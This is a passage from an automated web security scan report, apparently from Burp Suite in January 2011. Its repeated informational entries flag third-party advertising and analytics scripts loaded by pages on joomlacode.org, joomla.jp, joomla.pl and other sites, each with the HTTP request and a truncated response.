Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63634
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:00:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=ppm;kw=projectportfoliomanagement;kw=projectmanagement;kw=portfoliomanagement;kw=itmanagement;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1517562571?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">
   
<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&amp;ct=TOOLBOX_ROS&amp;num=5&amp;layt=560x350v1&amp;fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1517562571?">

   </script>
...[SNIP]...
<span><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.235. http://javascript.internet.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://javascript.internet.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://e1.cdn.qnsr.com/cgi/d/0/0/203/662677/cmp0.js
  • http://e1.cdn.qnsr.com/jsc/e1/fc.js
  • http://e1.cdn.qnsr.com/jsc/e1/fx.js
  • http://javascriptsource.us.intellitxt.com/intellitxt/front.asp?ipid=26021
  • http://jlinks.industrybrains.com/jsct?sid=829&ct=INTERNETCOM_DEVELOPER&tr=JAVASCRIPTINTERNET&num=5&layt=7&fmt=simp

Request

GET / HTTP/1.1
Host: javascript.internet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:30:30 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Tue, 25 Jan 2011 14:31:30 GMT
Connection: close
Content-Type: text/html
Content-Length: 70536

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>JavaScript Source: Free JavaScripts, Tutorials, Example Code, Reference, Res
...[SNIP]...
<!-- All U.S. Copyright laws apply in full effect. javascript.internet.com -->

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/662677/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
...[SNIP]...
<!-- START: MARCHEX -->
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=829&amp;ct=INTERNETCOM_DEVELOPER&amp;tr=JAVASCRIPTINTERNET&amp;num=5&amp;layt=7&amp;fmt=simp"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://javascriptsource.us.intellitxt.com/intellitxt/front.asp?ipid=26021"></script>
...[SNIP]...

21.236. http://joomfa.org/joomla-16-persian.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomfa.org
Path:   /joomla-16-persian.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://edge.quantserve.com/quant.js
  • http://www.persianstat.com/service/stat.js

Request

GET /joomla-16-persian.html HTTP/1.1
Host: joomfa.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 22:39:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: 16f55cf570d6624bbeb58e495d6f30df=a849d8a3dc9bc34166a8c90be1725ca5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:39:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fa-ir" lang="fa-ir" >
   <
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- PersianStat -->
<script language='javascript' type='text/javascript' src='http://www.persianstat.com/service/stat.js'></script>
...[SNIP]...

21.237. http://joomla.jp/news/1-projectnews/169-joomla-16-has-arrived.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomla.jp
Path:   /news/1-projectnews/169-joomla-16-has-arrived.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /news/1-projectnews/169-joomla-16-has-arrived.html HTTP/1.1
Host: joomla.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.10-pl0-gentoo
Set-Cookie: 7f6aa8350e5d9f947c38b269b8976dc4=4a235261b46f8b2ee986298970074f38; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:37:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15767

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.238. http://joomla.pl/powiadomienia/577-joomla-16-wydany.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomla.pl
Path:   /powiadomienia/577-joomla-16-wydany.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /powiadomienia/577-joomla-16-wydany.html HTTP/1.1
Host: joomla.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:05 GMT
Server: Apache
Set-Cookie: 4133b150d3474bb471372c7e0b1cd514=f7c7ef79892a51ea61ed57003bef1c55; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:37:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30587


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl-pl" lang="pl-pl" >
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.239. http://joomlacode.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET / HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 24 Jan 2011 22:30:01 GMT
ETag: "1358c51-4fb1-49a9f23fb6c40"
Accept-Ranges: bytes
Content-Length: 20401
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.240. http://joomlacode.org/gf/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20401


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.241. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:15:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20390


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.242. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:17:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.243. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:18:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.244. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:16:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20300


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.245. http://joomlacode.org/gf/account/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/account/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/account/?action=LostPassword HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9235


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.246. http://joomlacode.org/gf/project/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42660


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.247. http://joomlacode.org/gf/project/articlecomments/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/articlecomments/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/articlecomments/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:50:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.248. http://joomlacode.org/gf/project/autobb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/autobb/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/autobb/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:49:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14122


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.249. http://joomlacode.org/gf/project/bm01/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/bm01/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/bm01/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:45:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.250. http://joomlacode.org/gf/project/booking/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/booking/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/booking/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:46:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.251. http://joomlacode.org/gf/project/com_joodater/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/com_joodater/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/com_joodater/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:31:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.252. http://joomlacode.org/gf/project/com_joodater/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/com_joodater/news/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/com_joodater/news/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:29:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.253. http://joomlacode.org/gf/project/demosite/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/demosite/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/demosite/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:48:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32835


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

